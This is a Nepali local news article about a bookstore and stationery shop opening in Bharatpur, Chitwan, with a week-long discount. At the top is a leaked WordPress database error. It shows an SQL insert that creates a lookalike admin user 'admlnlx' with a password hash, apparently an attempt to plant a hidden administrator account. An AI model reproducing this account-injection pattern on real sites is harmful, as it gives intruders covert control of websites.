WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B8SmdvlWwaQFf78BrqCjv0mkAF7Z7n.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-26 00:40:54', '', 'admlnlx', 'admlnlx')
चितवन, माघ १९–
भरतपुर उपमहानगरपालीका वडा नम्वर–९ शरदपुरमा रहेको आरपी बुक्स एण्ड स्टेशनरीले एक सातासम्म छुटको अफर ल्याएको छ । आजदेखि औपचारिक रुपमा संञ्चालनमा आएको सो पसलले छुटको अफर ल्याएको हो ।
सरस्वती पूजाको अवसरमा पारि आज पसलको उद्घाटन गरिएको हो । करिव ४ लाखको लागतमा संञ्चालनमा ल्याईएको सो पसलमा स्कूल, बोर्डिङ्, कलेजका किताबहरु पाईनुका साथै खेलकुदका सामाग्रीहरु पनि प्राप्त गर्न सकिने पुस्तककी संञ्चालक पूर्णकला सुवेदी चापागाईले जानकारी दिनुभयो ।
भरतपुर ९ बोस्टन मार्गमा संञ्चालनमा ल्याईएको सो पुस्तक पसलमा केहि समयका लागि विशेष छुटका साथ पुस्तक तथा स्टेसनरी सामाग्रीहरु विक्रि वितरण गरिएको छ । शुभारम्भको अवसरमा एक साता सम्म पुस्तक तथा स्टेशनरी किन्न आउने ग्राहकवर्गलाई सो छुट व्यवस्था गरिने संञ्चालक चापागाईले जानकारी दिनुभयो ।